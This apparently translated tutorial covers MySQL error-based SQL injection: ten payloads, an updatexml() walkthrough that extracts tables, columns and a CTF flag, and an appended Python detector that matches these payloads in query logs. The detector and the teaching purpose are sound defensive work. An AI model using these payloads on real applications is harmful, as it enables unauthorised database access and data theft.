Error-based injection
During injection we usually judge results from the error messages the application echoes back, but many web applications today do not return normal error output, so the error-based injection technique is needed to carry out the SQL injection.
Ten MySQL error-based injection techniques
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
The three error-based injection methods we use most often are floor(), updatexml() and extractvalue().
Key point
SQL error-based injection
Analysis
Query the database currently in use
-1 union select updatexml(1, concat(0x7e, database(),0x7e),1)
Query the table names in the database
-1 union select updatexml(1, concat(0x7e,( select( group_concat( table_name))from information_schema.tables where table_schema="sqli"),0x7e),1)
Get the column names of the table
-1 union select updatexml(1, concat(0x7e,( select( group_concat(column_name))from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)
Get the contents of the columns of the table in the specified database
select * from news where id=-1 union select updatexml(1, concat(0x7e,(select( group_concat(flag)) from sqli.flag), 0x7e),1)
Obtain the flag
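A defender's counterpart to the ten techniques listed above and the updatexml() walkthrough: an added example, not part of the original page, that scans MySQL general-query-log entries for the error-based signatures those techniques leave behind. The log lines, timestamps and connection ids below are constructed for illustration.

```python
import re

# Signatures for the MySQL error-based techniques listed on this page. The
# updatexml/extractvalue rules require concat() so that ordinary XML use is
# not flagged; the geometry rules require a nested select as the argument.
ERROR_BASED_SIGNATURES = {
    "floor/rand/group by": re.compile(
        r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*?group\s+by", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(.*?concat\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(.*?concat\s*\(", re.I),
    "geometry": re.compile(
        r"\b(geometrycollection|multipoint|polygon|multipolygon|linestring|"
        r"multilinestring)\s*\(\s*\(?\s*select\b", re.I),
    "exp overflow": re.compile(r"\bexp\s*\(\s*~\s*\(", re.I),
}

# One entry of the MySQL general query log: timestamp, connection id, command, text.
GENERAL_LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")


def classify_query(sql):
    """Return the names of the error-based signatures found in one SQL statement."""
    return [name for name, pat in ERROR_BASED_SIGNATURES.items() if pat.search(sql)]


def scan_general_log(lines):
    """Return (timestamp, connection id, signatures) for every suspicious Query entry."""
    hits = []
    for line in lines:
        m = GENERAL_LOG_RE.match(line)
        if not m:
            continue  # Connect, Quit, Prepare and other non-Query entries
        found = classify_query(m["sql"])
        if found:
            hits.append((m["ts"], int(m["conn"]), found))
    return hits


# Constructed general-log sample (hypothetical timestamps and connection ids);
# entries 2-4 carry payloads from the page, the last two are benign.
SAMPLE_LOG = """\
2024-03-01T10:00:01.000001Z\t   12 Query\tselect * from news where id=1
2024-03-01T10:00:02.000002Z\t   12 Query\tselect * from news where id=-1 union select updatexml(1, concat(0x7e, database(),0x7e),1)
2024-03-01T10:00:03.000003Z\t   13 Query\tselect * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
2024-03-01T10:00:04.000004Z\t   14 Query\tselect * from test where id=1 and exp(~(select * from(select user())a))
2024-03-01T10:00:05.000005Z\t   15 Query\tselect st_astext(polygon(linestring(point(0,0),point(0,1),point(1,1),point(0,0))))
2024-03-01T10:00:06.000006Z\t   14 Quit\t
""".splitlines()

if __name__ == "__main__":
    for ts, conn, found in scan_general_log(SAMPLE_LOG):
        print(f"{ts} conn={conn}: {', '.join(found)}")
```

The benign polygon() call is deliberately included: the geometry rule only fires when the argument is a nested select, which is what separates the page's payloads from legitimate spatial queries.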